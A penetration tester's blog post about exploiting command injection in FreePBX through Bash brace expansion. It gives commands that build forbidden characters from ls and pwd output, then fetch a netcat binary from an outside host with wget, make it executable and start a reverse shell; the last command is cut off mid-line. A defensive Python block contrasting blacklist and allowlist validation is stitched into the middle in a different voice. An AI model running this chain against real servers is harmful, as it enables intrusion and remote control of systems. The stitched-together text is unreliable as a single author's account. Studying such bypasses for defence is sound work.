FreePBX Exploit and Brace Expansion

January 2017

During one penetration test, I stumbled upon a server running a vulnerable version of FreePBX. I tried a couple of exploits, but most of them did not work. The only exploit that worked was this curl command.

To make running commands easier, I wrote a simple Python script.

Usage of the script: python freepbx.py <server> <command>.

How it works

The developers attempted to prevent shell command injection by performing simple, yet inadequate, sanitization. Special chars were filtered, and thus I could not run nc -nv <ip> <port> or echo aaa > file.txt. I could only use one-word commands.

How can I use the exploit if I cannot use spaces? It turned out that it is possible to run commands without spaces by using the {ls,-l} syntax, which is called brace expansion. Brace expansion is a mechanism by which arbitrary strings can be generated in Bash and similar shells on Linux. It is similar to filename expansion. For example, echo a{d,c,b}e would produce three strings — ade, ace, and abe.
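Why deleting characters does not stop this, as an added example (not FreePBX's code and not the author's script): the blacklist below is an assumed stand-in for the filter described above, brace_expand models only non-nested comma groups, and the tool path and --name flag are hypothetical placeholders. The hardened half validates against an allowlist and builds an argument vector so no shell ever parses the value.

```python
import re

# ASSUMPTION: stand-in for the character blacklist the post describes; the
# real FreePBX filter is not shown on the page.
BLOCKED_CHARS = set(" \t/\\.<>;&")

def blacklist_sanitize(value):
    """Weak approach: delete 'dangerous' characters and hand the rest to a shell."""
    return "".join(ch for ch in value if ch not in BLOCKED_CHARS)

_BRACE_GROUP = re.compile(r"\{([^{}]*,[^{}]*)\}")

def brace_expand(word):
    """Words Bash generates from non-nested {a,b,c} groups (no {1..3} ranges)."""
    match = _BRACE_GROUP.search(word)
    if match is None:
        return [word]
    head, tail = word[:match.start()], word[match.end():]
    words = []
    for alternative in match.group(1).split(","):
        words.extend(brace_expand(head + alternative + tail))
    return words

# Hardened approach: accept only the shape the field should have. The first
# character must be alphanumeric so a value cannot be read as an option.
_ALLOWED = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,63}")

def allowlist_validate(value):
    if _ALLOWED.fullmatch(value) is None:
        raise ValueError("rejected input: %r" % value)
    return value

def build_argv(value):
    """Argument vector for subprocess.run(argv) with no shell involved.

    /usr/bin/example-tool and --name are hypothetical placeholders.
    """
    return ["/usr/bin/example-tool", "--name", allowlist_validate(value)]

if __name__ == "__main__":
    sample = "{ls,-l}"  # brace form quoted in the post
    print(blacklist_sanitize(sample), "->", brace_expand(sample))
    try:
        build_argv(sample)
    except ValueError as err:
        print(err)
    print(build_argv("report-2017"))  # constructed benign value
```

The blacklist returns {ls,-l} unchanged, and the shell then produces the two words ls and -l itself, which is why the fix is to keep user input away from the shell rather than to extend the list of blocked characters.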

I needed to write files, but I could not use / or \. The workaround was to use the command echo "Hello world" | dd of=test.txt, where of stands for Output File.

Then I needed to get a reverse shell, but I could not use dots and slashes. However, I could run commands, write files, and use command substitution. Therefore, I could run the following command to get a dot symbol:

python freepbx.py <server> "ls|{head,-n,1}|{cut,-c,5}|{dd,of=dot}"

This command takes a dot symbol from the ls output and writes it into a file. The dot happened to be the 5th character of the first file name in this particular case.

Then I repeated the same process for the slash symbol, but this time I generated it from the pwd command output like this:

python freepbx.py <server> "{pwd,}|{cut,-c,1}|{dd,of=slash}"

Now it was possible to get a reverse shell:

python freepbx.py <server> "{wget,exgq\$({cat,dot})pw\$({cat,slash})nc}"
python freepbx.py <server> "{chmod,+x,nc}"
python freepbx.py <server> "{\$({cat,dot})\$({cat,slash})nc,exgq\$({cat,dot})pw